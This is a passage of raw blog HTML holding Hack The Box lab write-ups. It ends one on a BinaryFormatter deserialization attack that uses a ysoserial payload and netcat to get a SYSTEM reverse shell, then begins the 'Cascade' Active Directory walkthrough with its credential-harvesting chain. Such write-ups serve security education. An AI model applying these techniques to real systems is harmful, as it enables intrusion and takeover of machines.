url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABlElEQVR42p1S226bQBDlI/PQ5/5BpKj9g35TlLcqqav6kqSAy0PkGJbLwnoxYCCWZeBkZhU77YvTZKSj3VnYMzNnj/Vr9BPObxu3t/fw/ngGru1idP0DIorwtN2irms0TXMSIgzhuC4sf+lDr1ZQaoXNZoOqKJClCjKWaJ+2+N/oug4hkVrr9docDMPw1+fhePYm+h49kXEkSQIrz3OTPIZriKR4IcK74tCMlBJW21QIkhJnFyN8Or9CFCukMoEQIbTWEIFAFEYki0JMHSiljCSpjGnEGMuHBTKlXzusNxV00eDz10t8+fYdZVWbywlpmBMhr6yxJiKZprTXyLIMGV1OZIqICiqdvxIeNNzSa+52O3wk/hl5RdU571lcwn6/R0fgdU9im/ywvuy7vjv+33e9OeOIyGaW7/vGZwXZpSzLN8ETcSeKGklJgpTGZ10ZnufBEkKgbVtUVWV8eApcmF2xWCzAk41ubjCb3ZnHm8/ncBwHlkvuZjGZmI15CjxSEASYTCaYTqcYj8eEiclt2ybyGZ4B8BA/wzzTrLIAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="upload complete" title="" src="/static/d8a0de804928a988ffddab3900d935c4/0cebb/upload-complete.png" srcset="/static/d8a0de804928a988ffddab3900d935c4/dda05/upload-complete.png 158w, /static/d8a0de804928a988ffddab3900d935c4/0cebb/upload-complete.png 259w" sizes="(max-width: 259px) 100vw, 259px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">ScrambleDebugLog.txt</code> updated to include the new order:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/ff35883d242343b3daa0e1958968135a/c12df/debug-log-upload-order.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 70.25316455696203%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACPUlEQVR42oVU65qqMAzkQUQFUVdXUIEC5aqIt/d/oOxMUHfPr/NjvobappPMRGexCCRJUymKQuIkkf1+L7vdTr9T7CfYOx5jjQ+HgyyDQFzXBaav9RfT6VQcz/OlLEvp+7OcTifEVqwtdK/rOqnKSuq6QdwCJ6mqSgmkSSpxHEsSJ4gT3SMRZzafS93UchkGOeHCue+lv1zwQC/X6yDX203uj4dcXnsPxM/HU+73hwzDFWeucgOez6eU1oozR8I8y6VpWqBRtGCWpiz1KMaYT+lkEqP8OIm1DQlY8gxbQbZhGILhbCaZJmykRDm6olxrCSsmNZ+kPMeYyLJMYbBvTKrxPtqPPaQAbduIRaKiyPUQe1Xhm4lWq9UH6/VallgDiOP7nvi4T3iep3CCYKkv13Wlr7AUNpcsMzAp8kLL3W63stlsdGVSH5cnk4lM3Mm4AlTa8f0FLleqctu2kue5Ju6guJZvrZbPMgvEowus9i7Ew+zbG3wQoswkR5lM1sAedV1LBfAR2qaFWLTTCXGDM+fzGU4YLaYCNqOd6ABaSVU2mXkJYcfeISH7Sra1Ji/VCWRusc9z/N0WVs8oe3yTtTOHytzsOtqlVaYExYj/WIJTZEymRo4J2igdzf2eJDX2HM3lJFxhbJbIUsiq7y8w7iB1VSsDChNFoUT7SMERDaPf/jHZlj2kymTYYFrygorGuBi9LFQoK5b6vf1WFd+KvlV13ck/8+z8/XPgeuDLu1CTsxyW/LX50sHnEPwPPyOkvO/m3cxJAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="debug log upload order" title="" src="/static/ff35883d242343b3daa0e1958968135a/50637/debug-log-upload-order.png" srcset="/static/ff35883d242343b3daa0e1958968135a/dda05/debug-log-upload-order.png 158w, /static/ff35883d242343b3daa0e1958968135a/679a3/debug-log-upload-order.png 315w, /static/ff35883d242343b3daa0e1958968135a/50637/debug-log-upload-order.png 630w, /static/ff35883d242343b3daa0e1958968135a/c12df/debug-log-upload-order.png 836w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>This revealed that the format to send uploaded orders to the server was <code class="language-text">UPLOAD_ORDER;&lt;SERIALIZED_DATA_HERE></code>. This was starting to look like a path for a deserialization attack.</p> <p>Further analysis of <code class="language-text">ScrambleLib.dll</code> showed how the <code class="language-text">SalesOrder</code> class was handling the serialization and deserialization of data objects:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5d08b903af855e615c6306ebc043536f/f2f9b/SalesOrder-BinaryFormatter.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 56.32911392405063%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABnElEQVR42oVTWZKbMBT0lRBCi7WAWD1szuT+d+m0xPgjNRPno0uUQK1eHjetHZRpIXREYzuE2KJtO3Sph7UelTCQzR010Siisahr/U/cpDSopcX08Rvz9ol+3LGvBz7PXzi49sMDaTrg0gYTRmQBQqj3hPnWbT7R82A/rTifxLnjSdJtfSKNKy+aqDy9VVcIFW0oEyEaR1seNZ+1jfDBExExR0BcewnORdTvFGp9ERrmKGldZmKuShHa0qLluzuE5He0qyngvxlK3ihtgk1rySzEAaGdsMwL5mlE248Ypg+EbmYxriisquZHpbecnxANJFteHixlOUiwspiTxTxx7gfWx4p53hCGDfd2QZtmdN1QXIgfFRKdHxD9BBUfUFyd65jfwCIGHk5UHYmE2I4cqQnDMMMa/63xi5APxrZo3AjL0egTCUIgaWB+vtjLB7MTUV147ZWx+zaHtYJmMb7bOW9rGZ1AW5m8NMtSvHVfYPvG4c4y82WRqrOLF/Gt/CnMQkpdQs63VkJzJWpzZcR3soAz+xVR/dpvzF9/zx8XU3Ga+/XshAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="BinaryFormatter used in SalesOrder class" title="" src="/static/5d08b903af855e615c6306ebc043536f/50637/SalesOrder-BinaryFormatter.png" srcset="/static/5d08b903af855e615c6306ebc043536f/dda05/SalesOrder-BinaryFormatter.png 158w, /static/5d08b903af855e615c6306ebc043536f/679a3/SalesOrder-BinaryFormatter.png 315w, /static/5d08b903af855e615c6306ebc043536f/50637/SalesOrder-BinaryFormatter.png 630w, /static/5d08b903af855e615c6306ebc043536f/f2f9b/SalesOrder-BinaryFormatter.png 744w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>In <code class="language-text">SerializeToBase64()</code>, the data gets converted into binary using the <code class="language-text">Serialize()</code> method from <code class="language-text">BinaryFormatter</code> and then encoded to base64 before being transmitted. In <code class="language-text">DeserializeFromBase64()</code>, the received data gets decoded from base64 to binary and then converted back to the original data with the <code class="language-text">Deserialize()</code> method from <code class="language-text">BinaryFormatter</code>.</p> <p><code class="language-text">BinaryFormatter</code> on the <a href="https://learn.microsoft.com/en-us/dotnet/standard/serialization/binaryformatter-security-guide" target="_blank">Microsoft Docs</a>:</p> <blockquote> <p>The <strong>BinaryFormatter</strong> type is dangerous and is <strong>not</strong> recommended for data processing. Applications should stop using <code class="language-text">BinaryFormatter</code> as soon as possible, even if they believe the data they're processing to be trustworthy. <code class="language-text">BinaryFormatter</code> is insecure and can't be made secure.</p> </blockquote> <p>More on the <a href="https://learn.microsoft.com/en-us/dotnet/standard/serialization/binaryformatter-security-guide#deserialization-vulnerabilities" target="_blank">Deserialize</a> method:</p> <blockquote> <p>calling <code class="language-text">BinaryFormatter.Deserialize</code> over a payload is the equivalent of interpreting that payload as a standalone executable and launching it.</p> </blockquote> <p>So when an order is uploaded, the data object gets serialized before being sent over to the server; once the server receives the data, it then gets deserialized back to the original object. Due to the vulnerabilities within <code class="language-text">BinaryFormatter</code>, this process can be exploited by uploading a payload that when deserialized, sends a reverse shell.</p> <p>I used <a href="https://github.com/pwntester/ysoserial.net" target="_blank">ysoserial</a> to generate the payload:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/23baa83263dbe9c04e4b55e15ea4b509/c251d/ysoserial.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 37.9746835443038%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABi0lEQVR42jVSyVLCUBDMH7gLaHmzQFlCIEAU5OCGLILLxSo9WMrmQSVAwOXn2+6XeOiaN/1m3nRPYq17fcTqYyTqb8QY29UR4idjbB0PseI+IVZ7IPeAVecRm+4rYpUB0cda4Rlxb4CEN8SG+4JV5tvkrXTTR649Q+F6gfx1gHxnDqcbxvLNFyr3v8i1Ajhtcu053N6SZ8buAk4nQK45ZW+AIvN0w4d1eDEhOUPmaooscXg5wQG59KXP3Cfvm/zg4tM0q0nIt2as9ZE6D3mbQ9RrlW+W5vUSo6ZXbqnq9hulrviASpZGjVToXOqFudtTzxfr6IwOlRfp0pINKZMKKcpxclZKOC3dmJg8VBWeM42pcZOJ1KvOuGuGfZbdmpnpdmsOm2SBu9P+xEu17qTAiXitxzH7XSIbDS+yptBdmGjJhlTqAZuNxciaHhK8ux8OCYxN7/7HNOpckV19oOhOUXu1tMgUFy7sn74jefZhliskz9+ROBpi53iEvdoYu9UIzP+xw3v9OqrTb/QHd6ArOMzCBaoAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ysoserial" title="" src="/static/23baa83263dbe9c04e4b55e15ea4b509/50637/ysoserial.png" srcset="/static/23baa83263dbe9c04e4b55e15ea4b509/dda05/ysoserial.png 158w, /static/23baa83263dbe9c04e4b55e15ea4b509/679a3/ysoserial.png 315w, /static/23baa83263dbe9c04e4b55e15ea4b509/50637/ysoserial.png 630w, /static/23baa83263dbe9c04e4b55e15ea4b509/c251d/ysoserial.png 751w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Back on the Kali VM, within the <code class="language-text">evil-winrm</code> shell as <code class="language-text">MiscSvc</code>, I uploaded <code class="language-text">nc64.exe</code> in <code class="language-text">C:\programdata</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5e02e7bef5267ccf08ff423fa7bd87e6/34428/upload-nc64.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 14.556962025316455%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAk0lEQVR42k2Maw6CMBCEOYtsKbQgj8BWQLBoMOr97zNukUR+fJnHbiaqU4dGO3B5Qdl4tP0HPLxRdSsqXlHzE417oZRMZgRlg9D/NOQj2YiIzBWU3xAbjzibhBmnoGZBbKW3foPsHapYNsjOUIHiAXVeReWWy03+o0QGExnUdpLCbyWlDNKt0InfCV7z3vHfH0kZX4wqXTjvBuIPAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="upload nc64" title="" src="/static/5e02e7bef5267ccf08ff423fa7bd87e6/50637/upload-nc64.png" srcset="/static/5e02e7bef5267ccf08ff423fa7bd87e6/dda05/upload-nc64.png 158w, /static/5e02e7bef5267ccf08ff423fa7bd87e6/679a3/upload-nc64.png 315w, /static/5e02e7bef5267ccf08ff423fa7bd87e6/50637/upload-nc64.png 630w, /static/5e02e7bef5267ccf08ff423fa7bd87e6/34428/upload-nc64.png 678w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Started a listener with <code class="language-text">nc</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 353px; " > <a class="gatsby-resp-image-link" href="/static/95b6a1838245d5726fcf90883dd2355c/3b7c6/netcat.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 27.848101265822784%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABG0lEQVR42o3P607CQBAF4L6GiRqgFwsUt629Q0sXamnaBmoBQ6KCl/d/huN2gsaYmPjjy+zkJDM7kjryoJlzKFYhlGcFZMYhGz6sIEM4r+BGOZxQiFZI8xbxcgNb9MxbUu4nJcZOCkkPCmjRDoPoCMXfQ+PvUGZHsKSF4XMESYVm/4rq4Rnr3Qnr7Ql1+4KyeUJeH7ARWXv4oMxNK0iT6QZm3MAMM4HDTDKwiINnDW1WxwGGbEa1p92RK8USbFyrNr0vZYtq/8aB1D6+iXMyRGlNZ7jiJMvPYAf3iBdrMHdBg5nLMTJj6LdTKGL4F9UIv3W9xFdbXPQmNJ3oLgZn3W/koUe167s3Gfl/kvqaA63b0G37QRHh7yr/wydGQcNMArTghgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netcat" title="" src="/static/95b6a1838245d5726fcf90883dd2355c/3b7c6/netcat.png" srcset="/static/95b6a1838245d5726fcf90883dd2355c/dda05/netcat.png 158w, /static/95b6a1838245d5726fcf90883dd2355c/679a3/netcat.png 315w, /static/95b6a1838245d5726fcf90883dd2355c/3b7c6/netcat.png 353w" sizes="(max-width: 353px) 100vw, 353px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Connected to port <code class="language-text">4411</code> on the target machine:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 362px; " > <a class="gatsby-resp-image-link" href="/static/acd691656012446e205198ded16e27e3/5223d/nc-connect-scramblecorp.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 25.316455696202528%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABCElEQVR42n3QS1PCMBDA8X4SH33QFhQRmtKWMpVXS5iCBSqC4njw4t3vP39DGA968PCbzO4ms7sxnNsErzekEVZYosYM1pjiCasrcToD+kOJfHxhMq8ZFVvmqwOL9ZGxPMeFimflnrtoyrUvMNxOiptUOHHNfbYjnu6JZkeiyQ6RSfLymWJ5YFW/k2QlQVIQZQuCQUGYSsLhWbOXYfohhlCFfPWGrI6M8kpNsmEmt4yLDYvqVU8hBjnpaEkQ5zg3MRdOlys30C4bPc30BFazj/Hx+UX6UOKqi157gKu+4IffTnW+cXLKqbrdivRDW7F+CTXDbcXYfh/TVR28UDP1KXTXv2y1lvWPb/+VpX0wcOvVAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nc connect scramblecorp orders" title="" src="/static/acd691656012446e205198ded16e27e3/5223d/nc-connect-scramblecorp.png" srcset="/static/acd691656012446e205198ded16e27e3/dda05/nc-connect-scramblecorp.png 158w, /static/acd691656012446e205198ded16e27e3/679a3/nc-connect-scramblecorp.png 315w, /static/acd691656012446e205198ded16e27e3/5223d/nc-connect-scramblecorp.png 362w" sizes="(max-width: 362px) 100vw, 362px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, I sent the payload in the format <code class="language-text">UPLOAD_ORDER;&lt;PAYLOAD_HERE></code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/fd2f6a0c3794264ffb0bea0e4df42ef0/e899a/send-payload.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 70.25316455696203%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACc0lEQVR42m1U13LbQAzkp2QmdlwyshVZkq3GTh7vKJFUs7o9+f+P2CxAx85DHjDAgcBiUSTv9inG3ajBo79H58ViGs+RuVeMwzkG0wLDmUX3OcW3m/5/ZPAh/U/tzZIlivoEVx3gmhOKxQGzuMLoA7A/MQraH+d4ph5MDe0Mg0lOMaqHjOuNMhVvGi0Iskds1sjsK8z8QNnDVkcFT+0W+Xyn2iy+vlnmGPrNnDnlloT2CNIK3iRgi3aDpNhoq1/Ae/WlxRZRtlKffE/knS8RpjUSs1JJizVyt8EssC3DnIGSEJsWQID8pEFIIClgq5OysRyLMMucgK60gIAnZsn8FcYzQ0DOqlq/a3uFtnTQQCmSEjjOCUj/vLnQv2NMO4qkWGtnqRH2WxTsyI8beEFSY768qOOvGCbmFNGm3KNszgrSbH7zvVOgjMVcdUZZX8j8DEftpysCxjUsWeVsuWCyJCgIgyzZ5OVOwVzdXkCSbzQ2d/RVF9W2PpPUO5cigJzVJxM9n5MmL5ZvbbKwJahbnFTknZgti50oZ47oyO1zDMwLOHMvJKAwLBTwqAwtgwr6SlYWv4BIIWEsfh1Hye/NG8+JeSzuOOOIS/XGviPDdgHSSsztCWPLBBm2nIwUyN1eL0DPR+KyDUGPtFmQRWSO2vLYLxUgNRttW8AdmZh/l6JMD2oH/GXNolpF7Ni8Emit7IYTJ0tpyGyr7EIG+FGFQBMqyNFPgoXaAiB2/yXHQy9Etx/jsReh+5Si04vR4X/CfTeAF6VL3PwcofPo4+FXiE7Xx/XtM77fDHF1O6QeULdvkR/3I8rLh4g9Vn19N8LV3Qh/AKFW/7t1lcTsAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="send payload" title="" src="/static/fd2f6a0c3794264ffb0bea0e4df42ef0/50637/send-payload.png" srcset="/static/fd2f6a0c3794264ffb0bea0e4df42ef0/dda05/send-payload.png 158w, /static/fd2f6a0c3794264ffb0bea0e4df42ef0/679a3/send-payload.png 315w, /static/fd2f6a0c3794264ffb0bea0e4df42ef0/50637/send-payload.png 630w, /static/fd2f6a0c3794264ffb0bea0e4df42ef0/e899a/send-payload.png 682w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">nc</code> caught a system shell:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 518px; " > <a class="gatsby-resp-image-link" href="/static/1a5bcf077287c8670ba27f52e5fc0912/bcfdf/system-shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 84.17721518987341%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACuElEQVR42n1UWXabQBDkJom1AdqQBMywCSHQvjh2LCf3P0mlutFTEjsvH/Vmgampqm5wBrMC/fiMrr2hn7zDjU+Ymgr1/ob68IbmeMPm9APl9gXby09kzTN6owTdof0nnJHZYlq8IEgPmOQnRMszFskGQbzGJFzBDwp4QY7BJIM7bccnL34QyLzjG4USFvUVu/M7yuaq2FBRtX1Fvr4iWZ0RFweE2Q6r3SvWhxtMcYQtT5jZBoGpYZZHzCnAlmf0xykckx+QVRcU6wtyjitas8sDkuUJRf2MlHu2PCq5vFfzQiGZmQZzW8OfZuh6Efo+VXshnGGwxNxsEKV7jg3CZPsYLdVNFiu4vNkd0zLtDpm5rEfzFVFiwHnXM3fEcFIq2dBKTFuzuFayhd3ofBbVStRxY/R88zjY86zudVyufXvHnVAOCtmceQTRWomEcMBKfumFeBpEd0L7gB4WuPIsRGewUHQJJ4gqpMwkX100t5SBZwzYMlvN974vc7lIogitRLRTiANV7bOVCGfK1og0r6MeFMhcCOJsrxcYjv6ELTNMqJx5jrI2U6LPvVa5UbXOglZDln0aVlTQqG2ZB4TkGYRrLIw8X/+26/0J21pXyyS0+R5FddVDWlmxFjdUzSJFDddUXpzZHsVfOT7yZL4CKVTPo+URX8xoS/IQa6HdImeGMdsoCGvme0ZanGj/oPYUzKol+Agh5Kc1ox2xOGZPSlbSLqJYFLZKa71ILjEklvEzadIShqZRm4IJm1VUCrkQSxTjWakvCkGfFtvxPwrL+ht2/JvsTj8RUlWze9OxM4ghz/xJga/sR6nwSB3wZyGtIk3tms+EE34+00V1V5WpIlErvSiKhcgngcylQNXmOy+9cV1p+3wi7MiXcEdbLYM5f12WWY2DkvOaBdveM22zlVylYJLxR9u/AONwJ1bpH2zhAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="system shell" title="" src="/static/1a5bcf077287c8670ba27f52e5fc0912/bcfdf/system-shell.png" srcset="/static/1a5bcf077287c8670ba27f52e5fc0912/dda05/system-shell.png 158w, /static/1a5bcf077287c8670ba27f52e5fc0912/679a3/system-shell.png 315w, /static/1a5bcf077287c8670ba27f52e5fc0912/bcfdf/system-shell.png 518w" sizes="(max-width: 518px) 100vw, 518px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-cascade/https://mgarrity.com/hack-the-box-cascade/Fri, 29 Dec 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/398258d8bd139e138104f77e812fb7f6/3b67f/cascade.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABAUlEQVR42p2RP0vDQBiHs2srSm0NTc7+Q2tyMUFrlXZxcNLNQ6Rk0IAIKgjSTi466ODgpl/C0S/4eKcWHNqLOvyGH9w9PO/7OiU/ZFoWRciCFzJTCZj3vrrtvYljg80uBYiGpLsR4Td0d/OhzjRYUX/udyKGg5jbk4RRGrOjwcUc6ESgGa/WjLhQKxwMeryOrujstRimEq8uP9fwa+B41O3NhDMlSHoR7/cZraTGZbrKVhJRsFhONDQGoim5ViHZ8SkvT48c7itujtap1sO/GZqUjaUb6J1JHs53eXtW3GV9ut92ZfHPKxc01F1uEwdtKmLNOmoucGxa8iVzVfmj24EfOiIDowu7XUkAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Cascade" title="" src="/static/398258d8bd139e138104f77e812fb7f6/50637/cascade.png" srcset="/static/398258d8bd139e138104f77e812fb7f6/dda05/cascade.png 158w, /static/398258d8bd139e138104f77e812fb7f6/679a3/cascade.png 315w, /static/398258d8bd139e138104f77e812fb7f6/50637/cascade.png 630w, /static/398258d8bd139e138104f77e812fb7f6/fddb0/cascade.png 945w, /static/398258d8bd139e138104f77e812fb7f6/3b67f/cascade.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Cascade is a Windows machine running Active Directory. An anonymous LDAP bind allows for enumeration of the environment, leading to the discovery of a password for <code class="language-text">r.thompson</code>. These credentials grant access to a few SMB shares, one of which contains an encrypted password for <code class="language-text">s.smith</code>. Once the password is decrypted, it can be used to access a share containing a .NET application. Decompilation and analysis of the application code leads to a hard coded IV and key which can be used to decrypt the password for <code class="language-text">arksvc</code> stored in a SQLite database. <code class="language-text">arksvc</code> is a member of the <code class="language-text">AD Recycle Bin</code> group, members of this group can read deleted AD objects. Viewing the attributes of the deleted objects reveals the password for <code class="language-text">TempAdmin</code> which is the same password for the <code class="language-text">administrator</code>, this results in a system shell.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e3032082d30df308c1bb1703cf19ddd7/6a49a/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 87.9746835443038%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC2ElEQVR42nVUWXLiUBDzUTIh2HjfdxsDhkBC1sn9z6KRHlCpqUo+VM/YbrVaamM5xQFO8wm7eYffHNDPbwbD/gM90Wxe4KVr+JkwIcgnrKIeC6/+EVa3+0Sz+zAENYvr6RnjQURnQ9bv3ok3dJtXFN0RGZsm9Yxl0PxMOJGom86YT1/YHv8SXxi2r2jGJ1TDyRTn3SPiaod7t8KfVWnO32C16zO8ZETeHlCTRLizcxLtjbK02SMstvA5alRskLUXhWpwexaXvOb7UbmFlVYz6uEJUb6FGw2G3EsG+OkIJ+zMb58eRixc8feCKh5uWBXfcEs8eFRY0peUHXJ2K9pHNCTP2E33b2jGZ2gS+acGIQMK2FAIMyIdECSdgdXTeBFIqYp1/eDWSMqZJC+GbGQwOhOO7FP9kkqWDMDxG6NsscqpkrBTWCN9GrZvpmhNKBAp7acXg7S8WKJ7WX0wKqNcxFI2IiI8rtHl3hrWWitxLe441jR/oKLSmJ4GfGEV9sZbJ+iuaI2yFU8vXvPZGnYg77WfA9dmfsckZVfSkWqlqmyPJD6ZrrIjYShhujGI8x0x00M2TSe4Mf3MGGrYUiEJNOptxJ4qk4IhcbxmeDYhiTygAp9qfBaLMMp29K7B3bLEH6fiqhEPCb+U8WxGvZGN9HDgVyFSqSpIHFGVCEMiyqSU4JmW3L1iRphrS45s1sOSVzENzTiWEGUbpHzJDXosmbbttf/B8bsretjEkteCrff53Cqvu6cR6/7E7hPuFhkWjha3up71D2jMyPfO9eS9hdvAkiL5WDNZjZhzDCGh8oj/Llm151oMvxBfyAzcC6yYhPJu4BKX9SOJT2gZRk6ikJ+cVKpYhL+SOlJaG5VWzs8uoYcFVyWluRlPkekU5K9CUSDyW5ZcdnQyK6OQknw2qSfFHlZND1MWhVyH5BpIpOJMRJP5zpW4CavUPs5mbZYc7zuoS1i21+EfkbFKLaxctIsAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/e3032082d30df308c1bb1703cf19ddd7/50637/nmap-scan.png" srcset="/static/e3032082d30df308c1bb1703cf19ddd7/dda05/nmap-scan.png 158w, /static/e3032082d30df308c1bb1703cf19ddd7/679a3/nmap-scan.png 315w, /static/e3032082d30df308c1bb1703cf19ddd7/50637/nmap-scan.png 630w, /static/e3032082d30df308c1bb1703cf19ddd7/6a49a/nmap-scan.png 729w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Open ports:</p> <ul> <li>53 (DNS)</li> <li>88 (Kerberos)</li> <li>135 (MSRPC)</li> <li>139, 445 (SMB)</li> <li>389, 3268 (LDAP)</li> <li>636, 3269 (LDAPS)</li> <li>5985 (WinRM)</li> </ul> <p>Active Directory:</p> <ul> <li>domain: cascade.local</li> <li>hostname: CASC-DC1</li> </ul> <p>I wasn't able to access any shares with anonymous logon:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4d25353d0586659317f1599a5edb60a6/7c5b2/list-shares-access-denied.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 18.354430379746837%; position: relative; bottom: 0; left: 0; background-image: 